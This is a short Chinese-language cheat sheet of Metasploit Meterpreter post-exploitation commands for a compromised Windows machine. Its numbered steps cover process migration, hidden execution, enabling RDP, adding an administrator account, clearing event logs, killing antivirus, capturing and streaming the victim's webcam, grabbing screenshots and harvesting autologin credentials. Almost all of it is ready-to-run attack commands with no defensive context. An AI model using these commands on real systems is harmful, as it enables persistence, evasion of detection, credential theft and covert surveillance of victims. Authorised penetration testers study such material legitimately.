metasploit后渗透阶段

一、进程迁移
1、手动迁移:
查看进程
ps

获取meterpreter进程PID
getpid

迁移到指定PID进程中
migrate 1234

2、自动迁移

run post/windows/manage/migrate

二、运行进程
用execute在目标系统中执行指定的程序:

execute -f /usr/test.exe [options]

可选参数:
-H:创建隐藏进程

三、启用RDP:

run post/windows/manage/enable_rdp

四、添加管理员账号:

run getgui -u hack -p hack

五、清除日志:

clearev

六、查看系统信息 :
sysinfo

七、查看是否为虚拟机 :
run post/windows/gather/checkvm

八、关闭主机 :
shutdown

九、查看运行时间 :
idletime

十、关闭杀软 :
run post/windows/manage/killav

十一、扫描摄像头
webcam_list

十二、抓拍照片:(保存在root目录下)
webcam_snap

十三、直播模式
webcam_stream 访问返回的网址可看到画面

十四、弹消息框

msg /server:127.0.0.1 * "hello"

十五、列举已登录的用户:
run post/windows/gather/enum_logged_on_users

十六、抓取自动登录的用户名密码:

run windows/gather/credentials/windows_autologin

十七、抓取屏幕:

screenshot

load espia

screengrab